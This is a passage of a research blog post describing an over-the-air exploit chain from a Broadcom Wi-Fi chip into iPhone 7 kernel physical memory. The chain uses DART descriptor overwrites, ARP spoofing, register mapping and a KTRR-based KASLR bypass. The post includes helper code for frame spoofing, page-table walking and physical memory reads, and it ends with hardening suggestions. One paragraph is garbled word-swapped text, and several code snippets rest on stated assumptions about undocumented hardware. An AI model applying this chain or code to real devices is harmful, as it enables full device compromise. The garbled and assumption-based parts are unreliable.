However, going over these quadwords, it quickly becomes apparent that no fully-controlled word exists within the structure. Indeed, the first and last words are composed of mostly constant values, whereas the third and fourth contain IO-Space addresses (whose forms are incompatible with DART descriptors). Nonetheless, on closer inspection, the second word turns out to be at least somewhat malleable. Its lower six bytes are governed by the destination MAC address to which the frame is being transmitted, while its two upper bytes contain the beginning of our source MAC.
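Concretely, assume the second quadword holds bytes 0 to 7 of the frame's Ethernet header: the destination MAC followed by the first two bytes of the source MAC. Reading it as a little-endian 64-bit value then puts the destination MAC in the low six bytes and the source-MAC prefix in the top two. The sketch below composes the word under exactly this assumed layout. The function name is hypothetical.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

using Mac = std::array<uint8_t, 6>;

// Little-endian value of the 8 bytes dst[0..5] followed by src[0..1].
uint64_t second_quadword(const Mac& dst, const Mac& src) {
    const uint8_t bytes[8] = {dst[0], dst[1], dst[2], dst[3],
                              dst[4], dst[5], src[0], src[1]};
    uint64_t word = 0;
    for (int i = 7; i >= 0; --i)
        word = (word << 8) | bytes[i];  // byte i ends up at bits [8*i, 8*i+8)
    return word;
}
```

For example, destination 11:22:33:44:55:66 and source AA:BB:... yield 0xBBAA665544332211.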

Assuming we could cause the host to send frames to a MAC address of our choosing, that would grant us control over the lower six bytes. However, the remaining two bytes are populated using our device’s MAC address, a much harder target for modification...

Spoofing The Source MAC?


To understand whether we can indeed modify the device’s MAC address, let’s take a closer look at the mechanisms through which the MAC address may be programmed on the Wi-Fi chip.

Like many production devices, Broadcom’s Wi-Fi chips allow chip-specific configuration to be stored using one of two mechanisms: either a block of Serial Programmable ROM (SPROM), or a set of One Time Programmable (OTP) fuses. The Wi-Fi chip present on the iPhone 7 uses the latter mechanism.

As for the host, it stores the Wi-Fi chip’s MAC address in the “device tree” (among many other device-specific properties). The “device tree” is a simple hierarchical representation of the hardware components used by the platform (much like its Linux counterpart of the same name), allowing consumers within the kernel to easily access (and populate) its nodes.

During the Wi-Fi chip’s initialisation, the AppleBCMWLANCore driver retrieves the contents of the chip’s OTP fuses (using the PCIe BARs) and parses them according to the PCMCIA Card Information Structure (CIS) format. Reverse-engineering the parsing functions in the kernel, it quickly becomes apparent that one tag in particular is significant for our purposes.

If a "Function Extension" tag is encountered in the CIS data embedded in the OTP, the kernel extracts the MAC address encapsulated within it and inserts it into the "local-mac-address" node in the device tree, which represents the Wi-Fi MAC address!
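The lookup described above can be sketched as a walk over a CIS tuple chain. This minimal sketch follows the generic PCMCIA tuple layout: a code byte, a link (length) byte, then the body. CISTPL_NULL is a single padding byte and CISTPL_END terminates the chain. It assumes the MAC is carried in a Function Extension tuple (code 0x22) of the LAN node-ID subtype (0x04), followed by a length byte of 6 and the six address octets. Whether AppleBCMWLANCore checks exactly these fields is our assumption, not something taken from the driver.

```python
CISTPL_NULL = 0x00    # padding tuple: a single byte, no link field
CISTPL_FUNCE = 0x22   # "Function Extension" tuple
CISTPL_END = 0xFF     # end-of-chain marker
FUNCE_LAN_NID = 0x04  # assumed subtype: LAN node ID (i.e. a MAC address)


def iter_tuples(cis: bytes):
    """Yield (code, body) for every tuple in a CIS chain."""
    i = 0
    while i < len(cis):
        code = cis[i]
        if code == CISTPL_END:
            return
        if code == CISTPL_NULL:
            i += 1
            continue
        if i + 1 >= len(cis):
            return  # truncated chain: the link byte is missing
        link = cis[i + 1]
        yield code, cis[i + 2 : i + 2 + link]
        i += 2 + link


def mac_from_cis(cis: bytes):
    """Return the MAC from the first LAN node-ID Function Extension, or None."""
    for code, body in iter_tuples(cis):
        if (code == CISTPL_FUNCE and len(body) >= 8
                and body[0] == FUNCE_LAN_NID and body[1] == 6):
            return ":".join(f"{b:02x}" for b in body[2:8])
    return None


otp = bytes([0x80, 0x02, 0xAA, 0xBB,          # unrelated vendor tuple
             0x22, 0x08, 0x04, 0x06,          # FUNCE, LAN node ID, 6 bytes
             0x03, 0x11, 0x22, 0x33, 0x44, 0x55,
             0xFF])                           # end of chain
print(mac_from_cis(otp))  # -> 03:11:22:33:44:55
```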


Extracting the stored OTP contents from the kernel, we can see that no such element is present in the OTP to begin with. This allows us to insert our own tag without fear of causing a collision:

Wi-Fi Chip OTP

Therefore, to modify the MAC address, all we'd need to do is fuse the corresponding bits into the OTP, thus inserting the new CIS tag. However, this is easier said than done. For starters, writing to the OTP is a risky operation and may result in permanent damage to the chip if done incorrectly. Moreover, as its name implies, writing to the OTP is a one-time operation, leaving no room for error. Perhaps we could avoid changing the MAC after all?
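The "no room for error" constraint can be phrased as a simple feasibility check. This minimal sketch assumes, as is typical for fuse arrays, that an unprogrammed OTP bit reads as 0 and that programming can only flip it to 1. We have not verified this polarity for this particular chip. Under that assumption, a new image is writable only if it never needs to clear a bit that is already set. Every bit it does set is permanent.

```python
def can_program(current: bytes, desired: bytes) -> bool:
    """True if `desired` is reachable from `current` by only setting bits.

    Assumption: fuses start at 0 and can only be blown to 1.
    """
    if len(current) != len(desired):
        raise ValueError("images must be the same length")
    # A bit set in `current` but clear in `desired` can never be restored.
    return all((c & ~d) == 0 for c, d in zip(current, desired))


def bits_to_blow(current: bytes, desired: bytes) -> list:
    """List (byte_index, bit_index) pairs that would have to be fused."""
    out = []
    for i, (c, d) in enumerate(zip(current, desired)):
        for bit in range(8):
            if (d >> bit) & 1 and not (c >> bit) & 1:
                out.append((i, bit))
    return out
```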

After discussing the above situation, my colleague Ian Beer suggested an alternative!

Why not, instead, check whether the high-order bits in the DART descriptor are actually used by the translation process? To test this suggestion, we'll use the research platform to insert a valid L2 descriptor into DART, with one small caveat: we'll modify the two upper bytes of the 64-bit descriptor to "corrupted" values. After inserting the mapping, we can simply insert a DMA hook into the firmware that performs a DMA access to the aforementioned address.


Running the above experiment, we are greeted with a positive result! Indeed, the upper bytes of the DART descriptor are ignored by the translation process, sparing us the need to modify the MAC.
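The consequence of this experiment can be modelled in a few lines. The experiment only establishes that the top two bytes are ignored. The sketch below additionally assumes that DART consumes exactly the low 48 bits of an L2 descriptor. Under that model, whatever two source-MAC bytes land at the top of the word, the translation is unchanged.

```python
CONSUMED_MASK = (1 << 48) - 1  # assumption: only the low 48 bits are consumed


def effective_descriptor(word: int) -> int:
    """Drop the top two bytes, which the translation ignores."""
    return word & CONSUMED_MASK


def same_translation(a: int, b: int) -> bool:
    """True if two 64-bit words would be treated as the same descriptor."""
    return effective_descriptor(a) == effective_descriptor(b)


clean = 0x0000_0008_1234_5003
corrupted = 0xBEEF_0008_1234_5003  # upper two bytes overwritten
print(same_translation(clean, corrupted))  # -> True
```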

Spoofing The Destination MAC


Having confirmed that the source MAC is no longer a barrier, all that remains is to cause the host to send a frame to a crafted MAC address. This would let us control the six significant bytes within our 64-bit word.

Naturally, one way to solicit a response from the host is to transmit an ICMP Echo Request (ping) to it, which triggers a corresponding ICMP Echo Reply. While this approach can easily trigger the transmission of frames from the host, it only allows frames to be transmitted to known destinations. It offers no control over the destination MAC.

To trigger communications to our target MAC, we'll first launch an ARP spoofing attack. We send a crafted ping from an arbitrary (unused) IP address, causing the host to send an "ARP Request" querying the MAC address of that IP. We then answer with an ARP Reply that encodes a MAC address of our choosing, thus associating the IP address with a crafted MAC value.
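The reply half of this exchange can be sketched with the standard ARP-over-Ethernet layout (RFC 826): hardware type 1, protocol type 0x0800, address lengths 6 and 4, opcode 2 for a reply. The helper names and addresses are illustrative only. As described next, in the actual attack such frames are ultimately injected into the host from the firmware rather than sent over the air.

```python
import socket
import struct

ETH_P_ARP = 0x0806  # EtherType for ARP
ETH_P_IP = 0x0800   # protocol type for IPv4
ARP_REPLY = 2       # ARP opcode for a reply


def mac(s: str) -> bytes:
    """Convert 'aa:bb:cc:dd:ee:ff' into six raw octets."""
    return bytes(int(x, 16) for x in s.split(":"))


def arp_reply(spoofed_mac: str, spoofed_ip: str,
              victim_mac: str, victim_ip: str) -> bytes:
    """Build an Ethernet frame whose ARP reply claims 'spoofed_ip is at spoofed_mac'."""
    eth = mac(victim_mac) + mac(spoofed_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,                  # hardware type: Ethernet
        ETH_P_IP,           # protocol type: IPv4
        6, 4,               # hardware / protocol address lengths
        ARP_REPLY,          # opcode
        mac(spoofed_mac), socket.inet_aton(spoofed_ip),  # sender: the crafted binding
        mac(victim_mac), socket.inet_aton(victim_ip),    # target: the host
    )
    return eth + arp  # 14-byte Ethernet header + 28-byte ARP payload
```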

However, several problems arise when using this method. First, recall that the MAC address is meant to masquerade as a valid DART L2 descriptor. As we've seen in our analysis of the descriptor formats, every valid L2 descriptor must have its two least-significant bits set. This poses something of a problem for MAC addresses, as their bottom bits carry special significance:


Setting the bottom two bits of the MAC address's first octet would mark it as a broadcast / multicast (group) address. As we are sending unicast traffic (and expecting a unicast response), it might be difficult to solicit such responses from the host. Furthermore, network-resident security devices might inspect the traffic and flag it as suspicious, especially as we are executing a classic ARP spoofing attack. What's more, the router or access point may refuse to route unicast traffic to a broadcast MAC.
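The following sketch looks at the same octet from both sides to show why the descriptor rule collides with Ethernet addressing. It relies on the standard IEEE 802 convention: bit 0 of a MAC's first octet is the individual/group bit and bit 1 is the universal/local bit. It also assumes the little-endian layout in which the first destination octet becomes the descriptor's least-significant byte. Under these assumptions, any destination MAC that passes as an L2 descriptor is necessarily a group address.

```python
def mac_flags(mac: str) -> dict:
    """Decode the two special bits of a MAC address's first octet."""
    first = int(mac.split(":")[0], 16)
    return {
        "group": bool(first & 0x01),                 # I/G bit: multicast/broadcast
        "locally_administered": bool(first & 0x02),  # U/L bit
    }


def usable_as_l2_descriptor(dst_mac: str) -> bool:
    """Check DART's 'two low bits set' rule against the MAC's first octet.

    Assumption: the first octet is the descriptor's least-significant byte.
    """
    first = int(dst_mac.split(":")[0], 16)
    return (first & 0x03) == 0x03
```

For example, `03:11:22:33:44:55` passes the descriptor check and is reported as both a group and a locally administered address. A typical unicast address such as `02:...` fails the check.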

To get around the above limitations, we'll simply inject the traffic directly from the firmware, without transmitting it over the air. To accomplish this, we've written a small assembly stub that, when executed on the firmware, injects the encapsulated frames directly into the host, as if they had arrived over the network.

This allows us to inject even potentially malformed traffic that would not have been routable, such as unicast traffic from a broadcast MAC. Indeed, after running the ARP spoofing vector with the above mechanism, we are able to solicit responses from the host to our crafted (broadcast) MAC address, since XNU does not object to sending unicast traffic to broadcast MACs. Great!


Inception


Finally, all the ducks are lined up in a row. We can solicit traffic to MAC addresses of our choosing (even broadcast MACs) without having to modify the source MAC. Furthermore, we can shape IO-Space in order to force a new DART translation table to be allocated adjacent to a flow ring within the kernel's VAS. Therefore, we can overwrite DART descriptors with our own crafted values, thus introducing new mappings into IO-Space. However, a single question remains: which physical address should we map into IO-Space?

After all, we still haven't dealt with the issue of KASLR. The kernel's load addresses, both physical and virtual, are "slid" by a randomised value, so we cannot locate physical addresses within the kernel until we uncover the slide's value. If we cannot reliably locate the kernel's base address, which physical addresses can we find?

To get around this limitation, we'll use one more trick! The host's physical address space houses the DRAM, in which kernel and application memory are stored, but other physically addressable regions can also be found in the PAS. For instance, hardware registers are mapped at fixed physical addresses, allowing the host to interact with peripherals on the SoC. Among these peripherals is DART itself!

As we've previously seen, DART's translation process is initiated using four "L0 descriptors". These descriptors are fed into DART's hardware registers and denote the base addresses of the translation tables from which the IO-Space translation process begins. If we were to map DART's hardware registers into IO-Space, we could read the descriptors and thereby locate DART's translation tables within the physical address space!

It should be noted that although DART's hardware registers are addressable within the host's physical address space, it is unclear why IO-Space mappings should be allowed to include ranges beyond the DRAM's bounds at all. Indeed, it stands to reason that the hardware would prohibit such mappings. However, as it happens, no such restriction is enforced: DART freely allows any physical range to be inserted into IO-Space.

Therefore, if we wish to map DART's own hardware registers into IO-Space, all that remains is to locate the physical range corresponding to them! To do so, we'll use a combined approach.

First, we'll use our research platform to extract the DART instance, from which we can retrieve the kernel VAS pointer corresponding to DART's hardware registers. Then, using our translation table module, we can convert that kernel virtual address to its matching physical range. After doing so, we are presented with the following result:


Great! The address is clearly not within the DRAM's range, hinting that we're on the right track.

To verify that this is indeed the right address, we'll use a second approach. As we already noted, the device hierarchy is stored within a structure called the "device tree". Properties relating to each peripheral, including the addresses of its hardware registers, are stored within this tree.

The device tree itself is present in binary form within the firmware image, encapsulated in an IMG4 container. After extracting it, we are presented with a blob storing the device hierarchy. Although the tree's format is undocumented, inspecting the binary reveals an extremely simple structure. Each node begins with a fixed header denoting the number of children and entries it contains, and each entry consists of a fixed-length name followed by a variable-length value. I later discovered that Jonathan Levin has similarly reversed this structure and has written a tool to parse out its contents (albeit for an IMG3 container); you can check out his script here.
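The structure just described maps onto a short recursive parser. In this minimal sketch, the exact field layout is our reading of XNU's public device-tree headers rather than something stated above, so treat it as an assumption. Each node starts with two little-endian 32-bit counts (properties, then children). Each property has a 32-byte NUL-padded name, a 32-bit length whose top bit is treated as a flag, and a value padded to 4 bytes. The child nodes follow the properties. The node names used in the test data are hypothetical.

```python
import struct

PROP_NAME_LEN = 32        # assumption: fixed-length, NUL-padded property names
LENGTH_MASK = 0x7FFFFFFF  # assumption: top bit of the length field is a flag


def parse_node(blob: bytes, off: int = 0):
    """Parse the node at `off`; return (node, offset just past the node)."""
    n_props, n_children = struct.unpack_from("<II", blob, off)
    off += 8
    props = {}
    for _ in range(n_props):
        raw_name = blob[off:off + PROP_NAME_LEN]
        (length,) = struct.unpack_from("<I", blob, off + PROP_NAME_LEN)
        length &= LENGTH_MASK
        off += PROP_NAME_LEN + 4
        name = raw_name.split(b"\0", 1)[0].decode()
        props[name] = blob[off:off + length]
        off += (length + 3) & ~3  # values are padded to a 4-byte boundary
    children = []
    for _ in range(n_children):
        child, off = parse_node(blob, off)
        children.append(child)
    return {"props": props, "children": children}, off


def find_node(node, wanted: str):
    """Depth-first search for the node whose 'name' property equals `wanted`."""
    if node["props"].get("name", b"").rstrip(b"\0").decode() == wanted:
        return node
    for child in node["children"]:
        hit = find_node(child, wanted)
        if hit is not None:
            return hit
    return None
```

Once the relevant node is found, its register-address property can be decoded to cross-check the physical address obtained from the kernel.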

Regardless, after writing our own Python script to parse the device tree, we are presented with the following result:


Ah-ha! We once again find the same physical address, confirming that our analysis of DART's hardware registers is correct.

Putting it all together, we can now use our exploit primitive to map the physical address containing DART's registers into IO-Space. Once mapped, we can read the hardware registers' values, including the L0 descriptors. It should be noted that accessing the hardware registers from the host requires strict 32-bit load and store operations; attempting a 64-bit load from the hardware registers returns a garbled value. Curiously, however, DMA to and from the hardware registers from the Wi-Fi chip goes unhindered!



Using the L0 descriptor, we can now extract the physical address of the next translation table in DART's hierarchy. Then, by repeating the exploit primitive and mapping the newly discovered physical address into IO-Space, we can descend down DART's translation hierarchy until we reach a DART L2 translation table. Thus, using one flow ring, we can bring them all, and in IO-Space bind them.
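The descent can be sketched as an ordinary multi-level page-table walk. Only the shape of the algorithm follows the text: four L0 entries, then an L1 table, then an L2 table whose entries must have their two low bits set. Everything about the encoding is hypothetical and for illustration only. This includes the 2/9/9/12-bit split of a 32-bit IO-Space address, the position of the physical address inside a descriptor, and the reuse of the L2 validity rule at L1. The callback `read_desc` stands in for "map this table with the exploit primitive, then DMA-read the entry".

```python
# Hypothetical IO-Space address split: [31:30] L0, [29:21] L1, [20:12] L2, [11:0] offset.
L0_SHIFT, L1_SHIFT, L2_SHIFT = 30, 21, 12
INDEX_MASK = 0x1FF
PA_MASK = ((1 << 48) - 1) & ~0xFFF  # hypothetical: address bits [47:12]


def desc_to_pa(desc: int) -> int:
    """Hypothetical: extract the next-level table (or page) physical address."""
    return desc & PA_MASK


def is_valid(desc: int) -> bool:
    """The two-low-bits rule from the text (applied at L1 too, by assumption)."""
    return (desc & 0x3) == 0x3


def translate(iova: int, l0_tables, read_desc):
    """Walk DART's hierarchy for `iova`; return the physical address or None.

    l0_tables: the four L1-table base addresses read from the L0 registers.
    read_desc(table_pa, index): hypothetical reader for one 64-bit descriptor.
    """
    table = l0_tables[(iova >> L0_SHIFT) & 0x3]
    for shift in (L1_SHIFT, L2_SHIFT):
        desc = read_desc(table, (iova >> shift) & INDEX_MASK)
        if not is_valid(desc):
            return None
        table = desc_to_pa(desc)
    return table | (iova & 0xFFF)
```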

Once an L2 translation table is located within the physical address space, we can map it into IO-Space using our exploit primitive one last time, thus inserting DART's own translation table into IO-Space!

By mapping DART's translation table into its own IO-Space ranges, we can now use DMA from the Wi-Fi chip to freely introduce new mappings into IO-Space, removing the need for the exploit primitive. We thereby gain full control over the host's physical memory!


Furthermore, as DART's translation entries are never cleared, once the malicious IO-Space entries are inserted they are guaranteed to remain accessible to the Wi-Fi chip until the device itself reboots. As such, the exploit only needs to run once to introduce a backdoor that allows the Wi-Fi chip to freely access the host's physical memory.

One curiosity of note is that DART has a rather large TLB. As a result, changes in IO-Space may not be reflected immediately, but only once the stale entries are evicted from the cache. Nonetheless, this is easily dealt with by mapping IO-Space addresses in a circular pattern, which allows stale entries to be cleared.
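A minimal sketch of such a circular pattern is a round-robin allocator over a window of IO-Space pages. A slot is reused only after every other slot has been used, which gives any stale TLB entry for it the longest possible time to be evicted. The window base and size are hypothetical. For this to help, the window would need to be larger than DART's TLB, whose actual capacity the text does not state.

```python
class CircularMapper:
    """Round-robin allocator over a window of IO-Space page slots."""

    def __init__(self, base_iova: int, n_slots: int, page_size: int = 0x1000):
        self.base_iova = base_iova  # hypothetical start of the window
        self.n_slots = n_slots      # should exceed the (unknown) TLB capacity
        self.page_size = page_size  # assumption: 4 KB IO-Space pages
        self.next = 0

    def next_slot(self) -> int:
        """Return the IO-Space address of the least recently used slot."""
        iova = self.base_iova + self.next * self.page_size
        self.next = (self.next + 1) % self.n_slots
        return iova
```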

Finding The KASLR Slide


At long last, we have complete control over the entire physical address space, directly from the Wi-Fi chip. Consequently, we can map and modify any physical address we want, even those corresponding to the kernel's data structures.

While this form of access is sufficient to subvert the kernel, there's one tiny snag we have yet to deal with: KASLR. Since the kernel's physical base address is randomised using the KASLR slide, and we have yet to deduce its value, we might have to resort to scanning the DRAM's physical address ranges until we locate the kernel itself.

This approach is rather inefficient. Instead, we can opt for a more elegant path. Recall that, as we've just seen, hardware registers may be freely mapped into IO-Space. As hardware registers are not affected by the KASLR slide (they are mapped at fixed physical addresses), they can be trivially located regardless of the current "slide" value.

Perhaps one of the hardware registers can be used as an oracle to deduce the KASLR slide?

Recall that newer devices, such as the iPhone 7, enforce the integrity of the kernel using a hardware mechanism dubbed "KTRR". Simply put, this mechanism allows the device to define "lockdown" regions in which subsequent modifications are prohibited. These regions are programmed using a special set of hardware registers.



Amusingly, this very same mechanism can be used to deduce the KASLR slide!

By mapping the physical addresses of the aforementioned hardware registers, we can read their contents directly from IO-Space. This, in turn, reveals the physical ranges encoded in the "lockdown registers", which hold none other than the kernel's base address.
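Once the lockdown register has been DMA-read, recovering the slide is a single subtraction. This minimal sketch assumes that the register yields the slid physical kernel base directly, as described above, and that the corresponding unslid base is known for the target build. Both that reference base and the 16 KB alignment sanity check are assumptions that would need adjusting per device and iOS version. No real register addresses are given here.

```python
SLIDE_ALIGN = 0x4000  # assumption: the slide is a multiple of the 16 KB page size


def kaslr_slide(lockdown_base_pa: int, unslid_base_pa: int) -> int:
    """Slide = observed (slid) kernel base minus the unslid reference base."""
    slide = lockdown_base_pa - unslid_base_pa
    if slide < 0 or slide % SLIDE_ALIGN:
        raise ValueError(f"implausible slide {slide:#x}; check the reference base")
    return slide


def slid(addr: int, slide: int) -> int:
    """Relocate an address taken from the unslid kernelcache."""
    return addr + slide
```

Any physical address computed offline from the kernelcache can then be relocated with `slid(...)` and mapped into IO-Space.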

The Exploit


Summing upwards all of the above, we’ve finally written an exploit, allowing total command over the device’s physical retentivity over-the-air, using Wi-Fi communication alone. You tin uncovering the exploit here.

It should be noted that several smaller details have been omitted from this blog post in the interest of (some) brevity. For instance, locating the offset between the newly allocated DART translation table and the flow ring requires probing various IO-Space addresses, while also ensuring that the alignment constraints imposed by the granularity of ring item sizes are met. We encourage researchers to read the exploit's code to find any such omitted parts.

The exploit has been tested against the iPhone 7 running iOS 10.2 (14C92). The vulnerabilities are present in versions of iOS up to and including iOS 10.3.3. Researchers wishing to use the exploit on different iDevices or different versions will need to adjust the symbols used by the exploit.


Upon successful execution, the exploit exposes APIs to read and write the host's physical memory directly over-the-air. It does so by mapping any requested address into the controlled DART L2 translation table and issuing DMA accesses to the corresponding IO-Space addresses.
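The read half of such an API can be sketched as a loop that maps one physical page at a time and never lets a single DMA cross a page boundary. This is a minimal sketch, not the exploit's actual code. `map_page` and `dma_read` are hypothetical callbacks standing in for "write an L2 descriptor into the controlled table" and "issue a DMA read from the Wi-Fi chip". The 4 KB page size is an assumption.

```python
PAGE = 0x1000  # assumption: 4 KB IO-Space pages


def phys_read(pa: int, length: int, map_page, dma_read) -> bytes:
    """Read `length` bytes of host physical memory starting at `pa`.

    map_page(page_pa) -> iova: hypothetical; maps one physical page into
        IO-Space via the controlled L2 table and returns its IO-Space address.
    dma_read(iova, n) -> bytes: hypothetical; DMA read issued by the chip.
    """
    out = bytearray()
    while length > 0:
        page = pa & ~(PAGE - 1)
        offset = pa - page
        chunk = min(length, PAGE - offset)  # never cross a page boundary
        iova = map_page(page)
        out += dma_read(iova + offset, chunk)
        pa += chunk
        length -= chunk
    return bytes(out)
```

A write path would mirror the same loop, replacing the DMA read with a DMA write.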

For convenience's sake, the exploit also locates the kernel's physical base address using the method described above (via the KTRR read-only region registers), allowing researchers to easily explore the kernel's physical memory ranges.

Afterword


Over the course of this series of blog posts, we've explored the security of the Wi-Fi stack on Apple devices. In doing so, we constructed a complete exploit chain that allows attackers to reliably gain control over the iOS kernel on an iPhone 7 using Wi-Fi communication alone.

During our research, we explored several components, including Broadcom's Wi-Fi firmware, the DART IOMMU, and Apple's Wi-Fi drivers. Each of these components is proprietary, so gaining visibility into their operation required substantial effort. We hope that by providing the tools used to conduct our research, we will encourage further exploration of these surfaces and help improve their security posture.

We've also seen how the iPhone uses hardware security mechanisms, such as DART, to provide isolation between the host and potentially malicious components. These mechanisms significantly raise the bar for launching successful attacks against the host. Nonetheless, further research into DART is needed to explore all facets of its implementation. For instance, while we've explored the enacted IO-Space through the prism of the Wi-Fi chip, other PCIe components on the SoC are similarly guarded by DARTs. These components remain, as yet, unexplored.

Apart from fixing individual vulnerabilities in the security boundaries between the host and the Wi-Fi chip, several structural enhancements could make future exploitation harder. These include introducing read-only mappings to DART (if they are not already present), clearing unused descriptors from DART's translation tables when the associated component is rebooted, and preventing IO-Space mappings from exposing physical ranges beyond the DRAM.
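The last of these suggestions amounts to a bounds check at the point where a descriptor is written. Below is a minimal sketch of such a policy check with a hypothetical DRAM range. The text does not specify where such a check would live, whether in the kernel driver or in DART itself, and this sketch does not assume either.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Range:
    start: int
    size: int

    @property
    def end(self) -> int:
        return self.start + self.size


def mapping_allowed(pa: int, size: int, dram: Range) -> bool:
    """Reject IO-Space mappings that reach outside DRAM (e.g. MMIO registers)."""
    if size <= 0:
        return False
    return dram.start <= pa and pa + size <= dram.end
```

With a hypothetical DRAM range of `Range(0x8_0000_0000, 0x8000_0000)`, a page inside DRAM is accepted. A register page outside it, or a mapping straddling its end, is refused.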

Lastly, while memory isolation goes a long way towards defending the host against a rogue Wi-Fi chip, the host must still treat all communications originating from the Wi-Fi chip as potentially malicious. To this end, the numerous communication channels between the two endpoints (including event packets, "ioctls", and control commands) must be designed to withstand malformed data transmitted by the chip.
